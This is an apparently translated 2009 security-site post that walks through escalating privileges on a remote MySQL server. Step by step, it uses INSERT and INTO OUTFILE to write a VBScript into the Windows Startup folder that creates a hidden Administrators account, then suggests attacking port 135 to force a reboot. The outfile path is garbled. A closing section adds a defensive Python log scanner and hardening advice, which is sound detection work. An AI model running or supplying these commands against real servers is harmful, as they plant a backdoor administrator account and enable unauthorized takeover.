Privilege escalation by writing to the startup items from a phpshell - Vulnerability Warning - Black Bar Safety Net

2009-12-13T00:00:00
ID MYHACK58:62200925588
Type myhack58
Reporter Anonymous
Modified 2009-12-13T00:00:00

Description

In practice, from a webshell you can escalate privileges with udf.dll: use its file-upload function to upload a file to the startup directory, then use its shutdown function to restart the system. (Not successful so far; I will test locally when I get the chance, and am recording it here first.) On an English-language system, the startup directory is "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup".

1, Connect to the other party's MySQL server:
    mysql -u root -h 192.168.0.1
The mysql.exe program is in the BIN directory of your MySQL installation.

2, See which databases are on the server:
    mysql>show databases;
A default MySQL installation has two databases, MYSQL and TEST; any other database you see was created by the user.

3, Enter a database:
    mysql>use test;
This puts us in the test database.

4, See which tables are in the database we entered:
    mysql>show tables;
By default, test contains no tables. What follows is the key part.

5, Create a new table in the TEST database:
    mysql>create table a (cmd text);
This creates a table named a that stores a single field, named cmd, of type text.

6, Insert the content into the table:
    mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
    mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1/add"",0) " );
    mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 1 /add"",0) " );
Note the double quotes and parentheses, and be sure to enter the trailing "0"! These three statements will be used to create a VBS script.

7, Now check what table a contains:
    mysql>select * from a;
The table should show three rows of data, which is the content just entered. Once you have confirmed that the content is correct, move on to the next step.

8, Output the table as a VBS script file:
    mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\"Start"Menu\\Programs\\start\of\ \ a. vbs";
This writes the contents of the table into the startup group as a VBS script file. Note the "\" symbol.

9, As everyone has surely realised by now, this uses MySQL to output an executable file. Why not a BAT file? Because when it runs at startup an obvious DOS window appears, whereas a VBS script can hide the window completely and shows no error prompts. Originally there was meant to be a final line that makes the script delete itself after it finishes, but it cannot handle the Chinese directory, so that has been given up for now. Then find a tool that attacks 135 to make the server restart, and a few minutes later you are the administrator.
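
A defender can catch step 8 in the server's general query log: an INTO OUTFILE or INTO DUMPFILE statement whose target sits in a startup folder or carries an executable extension. The Python below is an added example, not code from the original post; the log layout, the sample lines, the extension list and the localized folder name are assumptions.

```python
import re

# Constructed sample lines; assumed layout: timestamp <TAB> thread-id command <TAB> statement
SAMPLE_LOG = "\n".join([
    "2009-12-13T10:00:01Z\t    7 Query\tshow databases",
    "2009-12-13T10:00:30Z\t    7 Query\t"
    + r'select * from a into outfile "c:\\docume~1\\alluse~1\\Start Menu\\Programs\\Startup\\a.vbs"',
    "2009-12-13T10:05:00Z\t    9 Query\t"
    + "SELECT id FROM orders INTO OUTFILE '/var/lib/mysql-files/orders.csv'",
    "2009-12-13T10:06:00Z\t   11 Query\tselect 0x00 into dumpfile 'C:/mysql/lib/plugin/x.dll'",
])

OUTFILE_RE = re.compile(r"\binto\s+(?:outfile|dumpfile)\s+(['\"])(.+?)\1", re.I)
# Extensions that Windows or a web server will execute (assumed watch list).
EXEC_EXTS = {".vbs", ".vbe", ".js", ".wsf", ".bat", ".cmd", ".exe", ".dll", ".php"}
# Folders run at logon; the second is the Chinese-locale name (assumed, adjust per locale).
AUTORUN_DIRS = {"startup", "启动"}

def outfile_target(statement):
    """Return the normalised path a statement writes to, or None."""
    m = OUTFILE_RE.search(statement)
    if m is None:
        return None
    # Undo MySQL string escaping (\\ -> \) and unify separators.
    return m.group(2).replace("\\\\", "\\").replace("/", "\\")

def classify(path):
    """List the reasons a server-side write to this path is suspicious."""
    parts = path.lower().split("\\")
    reasons = []
    if AUTORUN_DIRS & set(parts[:-1]):
        reasons.append("autorun-directory")
    name = parts[-1]
    if "." in name and "." + name.rsplit(".", 1)[1] in EXEC_EXTS:
        reasons.append("executable-extension")
    return reasons

def scan(log_text):
    """Return (timestamp, thread_id, path, reasons) for each risky write."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split("\t", 2)
        if len(fields) != 3:
            continue
        target = outfile_target(fields[2])
        reasons = classify(target) if target else []
        if reasons:
            findings.append((fields[0], fields[1].split()[0], target, reasons))
    return findings
```

Setting secure_file_priv to a dedicated export directory and revoking the FILE privilege from accounts that do not need it blocks the write itself; the scan then serves as a check that the restriction holds.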